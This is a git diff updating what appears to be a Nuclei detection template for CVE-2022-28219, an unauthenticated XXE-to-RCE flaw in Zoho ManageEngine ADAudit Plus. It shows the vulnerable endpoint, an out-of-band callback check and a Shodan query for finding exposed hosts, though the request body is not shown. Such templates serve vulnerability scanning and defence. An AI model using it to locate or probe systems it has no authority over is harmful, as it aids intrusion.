Update CVE-2022-28219.yaml
parent
72d3f332fa
commit
6468bf9ac4
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2022-28219
|
||||
|
||||
info:
|
||||
name: Unauthenticated XXE to RCE in Zoho ManageEngine ADAudit Plus
|
||||
name: Zoho ManageEngine ADAudit Plus - Unauthenticated XXE to RCE
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: |
|
||||
|
@ -21,12 +21,16 @@ info:
|
|||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-28219
|
||||
cwe-id: CWE-611
|
||||
tags: cve,cve2022,xxe,rce,zoho,manageengine
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus"
|
||||
tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/api/agent/tabs/agentData"
|
||||
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: |
|
||||
|
@ -46,3 +50,8 @@ requests:
|
|||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "ManageEngine"
|
||||
|
|
Loading…
Reference in New Issue